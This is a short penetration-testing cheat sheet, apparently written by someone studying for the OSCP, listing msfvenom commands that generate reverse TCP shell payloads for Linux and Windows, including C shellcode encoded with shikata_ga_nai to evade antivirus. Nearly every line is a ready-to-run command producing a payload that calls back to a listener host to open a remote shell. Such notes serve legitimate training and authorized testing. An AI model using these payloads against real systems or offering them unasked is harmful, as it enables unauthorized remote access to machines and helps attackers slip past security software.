Shells Created with Msfvenom

This is a reference for creating msfvenom payloads for target machines that may not support a command line reverse shell.

Linux Reverse TCP Shells

Staged Elf

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.0.0.1 LPORT=1337 -f elf > staged.elf

Non-Staged Elf

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=1337 -f elf > nonstaged.elf

Windows Reverse TCP Shell

Non-Staged Exe

I prefer to use the stageless shellcode on windows when possible. I learned this while studying for the OSCP and since metasploit/meterpreter are restricted, I am used to not using a multihandler.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=1337 -f exe > nonstaged.exe

Windows Shell Code for Buffer Overflows

Shikata ga nai (which means ‘it cannot be helped’ in Japanese) is an encoder we use to help evade anti-virus.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=1337 -f c -a x86 --platform windows -b "\x00" -e x86/shikata_ga_nai > shellcode.txt